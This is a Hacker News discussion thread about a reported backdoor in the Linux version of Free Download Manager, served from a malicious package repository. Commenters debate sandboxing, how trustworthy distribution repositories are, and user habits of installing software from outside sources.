[HN Gopher] Free Download Manager backdoored - a possible supply...
___________________________________________________________________
Free Download Manager backdoored - a possible supply chain attack
on Linux
Author : donutshop
Score : 60 points
Date : 2023-09-12 19:46 UTC (3 hours ago)
(HTM) web link (securelist.com)
(TXT) w3m dump (securelist.com)
| codedokode wrote:
| This is one more reason to run every program in a sandbox rather
| than with full privileges.
| Obscurity4340 wrote:
| Should people reflexively refuse prompts to authenticate as
| admin and see if the underlying programs still work as
| expected? This comes up all the time for Macs and the keychain
| acatton wrote:
| I disagree. This is more another reason to not run programs
| which are not from the official repository.
| throwaway71271 wrote:
| why do you think this can not happen in the official
| repository?
| acatton wrote:
| Because the official repository has a strict vetting
| process. You cannot just show up and put your shaddy
| software in the official repository.
|
| Debian packagers have a mutual trust process which you need
| to gain. Only trusted Debian packagers can approve packages
| to be included. Also some Debian maintainers will just
| randomly check packages from time to time. (e.g.
| https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=792580 )
| throwaway71271 wrote:
| the list of contributors is huge, you just need to hack
| one person https://contributors.debian.org/
|
| not to mention libraries like libxslt that is used by
| like half the packages
|
| even kernel.org was hacked, and git saved us, and luckily
| it was before the sha1 collision attacks were viable
|
| https://www.reddit.com/r/linux/comments/k0mco/kernelorg_c
| omp...
| https://crypto.stackexchange.com/questions/99767/how-
| easy-is...
| wfurney wrote:
| Nice classic email spam at the end of that thread!
|
| > "All we require from you is your willingness and
| ability to receive the funds in question"
| amenghra wrote:
| You can report the spam by clicking on the link at the
| very bottom (or just going to https://bugs-
| master.debian.org/cgi-bin/bugspam.cgi?bug=79258... and
| confirming).
| kelnos wrote:
| But Debian packagers aren't always super careful. They
| generally don't audit the full changeset between each
| version they package and publish. They mostly trust that
| upstream has not been compromised and continues to be
| trustworthy.
|
| I'm not trying to minimize all the hard work Debian (or
| any other distro) packagers do, but "only use official
| repositories" is not sufficient as a malware-avoidance
| strategy. Yes, it's better than installing random
| binaries from random websites, but let's not give
| ourselves a false sense of security.
|
| The suggestion upthread to run everything in a sandbox is
| a good one. I wish that was more common and that there
| was a better UX when doing so.
| [deleted]
| professor_m221 wrote:
| I see free. I download!
| NotYourLawyer wrote:
| If you intentionally install something called Free Download
| Manager, you should not be surprised when it turns out to be
| malware.
| mulmen wrote:
| Yeah who would ever trust a free BSD?
| DiabloD3 wrote:
| Why would you use a "Free Download Manager" when wget is right
| there? Or a web browser, such as Firefox? Or torrent clients to
| deal with large Linux ISO downloads? Or the various storefronts,
| like Steam? Or your own distro's package manager?
|
| This wasn't packaged on any distro, so this isn't even a
| meaningful attack: Users had to go out of their way to install it
| from a foreign source. This is no different than if you
| downloaded a random .exe off and ran it on Windows with admin
| access.
|
| Its not a supply chain attack, its a PEBKAC attack.
| ryandrake wrote:
| From their website[1]:
|
| > FDM can boost all your downloads up to 10 times, process
| media files of various popular formats, drag&drop URLs right
| from a web browser as well as simultaneously download multiple
| files!
|
| No, I still don't a clue what it actually does that the OS and
| existing tools can't. It sounds like those scam "RAM doubler"
| programs from the 90s. Run this executable to _boost your
| system 's chakras_.
|
| 1: https://www.freedownloadmanager.org
| [deleted]
| pixl97 wrote:
| Who uses a download manager in the days of high speed internet
| access and, in general, cloud services?
| sneak wrote:
| Download managers are _more_ important on high speed links than
| ever.
|
| The more bandwidth you have (and use), the less adequate the
| little "downloads" pane in your browser is.
| jandrese wrote:
| People who are still on dialup modems or very slow wireless
| ISPs with flaky connections. High Speed Internet is not
| universal even today, despite what web developers seem to
| think. Ever try to surf raw Facebook on a 128kbps wireless
| link? It's not fun. Cloud services are a joke for these people.
|
| Hacker News is one of the last holdouts in the low bandwidth
| friendly website game.
| OfSanguineFire wrote:
| A decade ago, I remember buying 500MB or 1GB of mobile
| internet credit and burning through that in an evening just
| reading news and stuff. Today, with uBlock Origin and
| NoScript, I can buy the same amount of mobile internet and it
| lasts me quite a while. I therefore concluded that, while
| website bloat does exist, what really consumes bandwidth is
| advertising, and that can be avoided. Moreover, a decade ago
| lazy loading of images was not common, but now the respective
| CSS tag exists, is supported by browsers, and widely
| implemented by CMSs like Wordpress.
| blackhaz wrote:
| Happy FileZilla user here, on my FreeBSD laptop. I move tons of
| files from remote astronomical observatory routinely, sometimes
| need to define custom rules - what to download, upload, filter
| across folders, etc. Sometimes I need to push a file from very
| low data-rate link from somewhere in the middle of nowhere to
| the observatory, sometimes over a satellite link. Sometimes I
| want a throttled download of a large queue so I won't overload
| my connection and leave some bandwidth to other users. Also, I
| have a directory of different FTP servers I work with, it's
| easy to keep them in one place. So, there you have it.
| postmodest wrote:
| R sync has a --bwlimit option.
|
| But I suppose you're probably talking about devices that only
| know about internet protocols before 1991....
| jpc0 wrote:
| On linux...
|
| I mean if I found something called free download manager on a
| technologically challenged family member's PC I would just
| assume its malware to start with.
| NoZebra120vClip wrote:
| Honestly, there were several download managers which were
| essentially forced by folks like Microsoft and Logitech. If I
| remember correctly, when I had an educational license with
| Microsoft Imagine, the most challenging bit was getting the
| mandatory download manager working. IIRC, I didn't actually
| have a Windows machine to put it on or something. So, I had
| to jump through some hoops. The software was plain
| inaccessible without going through the proprietary download
| manager.
|
| Logitech did similar hijinks for a long time. I can't
| remember whether it was mandatory, but it sure was difficult
| to avoid.
| aborsy wrote:
| Similar software is used in some products. For example,
| synology DSM has a package called download station. Who knows
| if it's based on some obscure .deb (or scripts such as youtube-
| dl).
|
| It could give rise to a supply chain attack.
| bubblethink wrote:
| axel -n 10
| andersa wrote:
| They can be very useful for:
|
| - bypassing antiquated per connection throttles on otherwise
| fast servers by downloading chunks in parallel
|
| - downloading files such as videos from sites that don't really
| want you to download the file
|
| I have never heard of the program in the article, but this one
| still sees many active users on windows for the above reasons:
| https://jdownloader.org/
|
| There's even a little community still making and maintaining
| plugins for extracting files from uncooperative websites.
| Really does feel like the kind of program you only ever want to
| be running in a sandbox though!
| dataflow wrote:
| I do. Just because your internet access is fast that doesn't
| mean remote servers don't throttle on a per connection basis.
| pohuing wrote:
| Or that everyone else also has fast Internet
| vorpalhex wrote:
| It's really handy to be able to kick bigger or automated file
| operations to a backend service.
| [deleted]
| meepmorp wrote:
| I'm trying to imagine the kind of user that's both able to
| blindly install a random .deb downloaded from a website, while
| also being willing to do so. Linux geeks with no sense of
| danger on the internet?
| zem wrote:
| not too terribly different from `sudo (curl | bash)`
| lcnPylGDnU4H9OF wrote:
| One can google "install .deb fedora" and get a litany of web
| pages which will contain words explaining how to do this.
| Fedora (and other distributions) is easy enough to install
| that one doesn't really need to be a "Linux geek" in order to
| be on Linux and such a person is not quite so likely to
| wonder whether or not they trust the code they're running.
|
| Couple that with the fact that it works out well Most Of The
| Time[0] and you've got a pretty likely scenario even if it
| affects a relatively small number of people.
|
| [0] I mean in general when downloading software as well as in
| the context of this particular story[1].
|
| [1] > Starting in 2020, the same domain at times redirected
| users to the domain deb.fdmpkg[.]org, which served a
| malicious version of the app.
| lstamour wrote:
| If you have a web browser and Linux, you can often install a
| .deb just by opening it in Software Centre or other graphical
| utilities to install apps. The comparison might be someone on
| windows trusting a random .msi or installer .exe or someone
| on Mac installing a random .app package. It's somewhat normal
| these days. Package managers are sometimes harder to
| understand and app stores often don't have the app you want
| or the newest version. Sometimes the app directs you to the
| website to install an update - or updates itself from a
| compromised location.
| dang wrote:
| Url changed from
| https://arstechnica.com/security/2023/09/password-stealing-l...,
| which points to this.
|
| Submitters: " _Please submit the original source. If a post
| reports on something found on another site, submit the latter._ "
| - https://news.ycombinator.com/newsguidelines.html
| fortran77 wrote:
| But I thought there were no viruses or malware on Linux! For
| example: https://www.howtogeek.com/135392/htg-explains-why-you-
| dont-n...
| yjftsjthsd-h wrote:
| Look, if the malware spreads by users _manually installing it_
| , 1. it's not really an OS problem, 2. an AV wasn't going to
| save them.
| Gigachad wrote:
| That's how almost all malware was installed though. Linux
| really isn't any more resistant to malware than anything
| else.
| acatton wrote:
| This is installed by adding a shady repository to your apt
| sources.list...
|
| How is this a supply chain attack? My official debian repository
| have never been breached so far.
|
| This is no different from downloading an .exe off a shady website
| and blindly running the .exe.
|
| Also:
| https://packages.debian.org/search?keywords=download+manager...
| lists:
|
| * uget: https://sourceforge.net/projects/urlget/
|
| * kget: https://apps.kde.org/en-gb/kget/
|
| * persepolis: https://persepolisdm.github.io/
|
| why use "Free Download Manager" when high quality ones are
| already officially packaged by debian? Is this targeting new-
| comers from windows?
| sva_ wrote:
| > This is installed by adding a shady repository to your apt
| sources.list...
|
| How is this possible? Aren't the packages signed like on
| ArchLinux so that you can use any mirrorlist?
| sudobash1 wrote:
| This is more like using AUR (except the packages are prebuilt
| with no way to inspect source). They are entirely user
| submitted.
| acatton wrote:
| No. This is not AUR, this is an _entire third party
| repository._ It would be the equivalent of these https://wi
| ki.archlinux.org/title/Unofficial_user_repositorie...
| acatton wrote:
| Yes, they are signed, but not with the official key. If you
| add it through the UI, it will auto-accept the key from the
| repository. (I'm not sure how it exactly works, it might ask
| the user for the confirmation)
|
| If you do it from the command line, by editing files, you
| will have to add the key manually.
|
| But most inexperienced users will just copy/paste and run the
| "curl | sudo apt-key add" command from the shady repository
| website, because they want to run the software.
|
| This is not much different from downloading an .exe from an
| untrusted website, and ignoring the warning from windows when
| running the .exe.
| [deleted]
| baz00 wrote:
| Basically, as per everything these days, the entire software
| industry is based on "download and run any old shit off the
| Internet" with little to no fucks given about the source or
| trustworthyness or correctness. End users are no better because
| for most people, including a lot of novice Linux users, this
| isn't even considered as part of fixing or dealing with any
| particular problem. Cut / paste / job done.
|
| Worst is I've seen CD/CI systems which just pull unsigned
| unverified binaries off the internet and build software from
| github, random APT and YUM repos, all sorts of shit. This is
| then all thrown together and pushed into production systems.
| acatton wrote:
| It doesn't have to be. Corporations which are FedRAMP[1]
| compliant, have to build software reproducibly in a fully
| isolated environment, only from reviewed code.[2]
|
| [1] https://en.wikipedia.org/wiki/FedRAMP
|
| [2] https://slsa.dev/
___________________________________________________________________
(page generated 2023-09-12 23:00 UTC)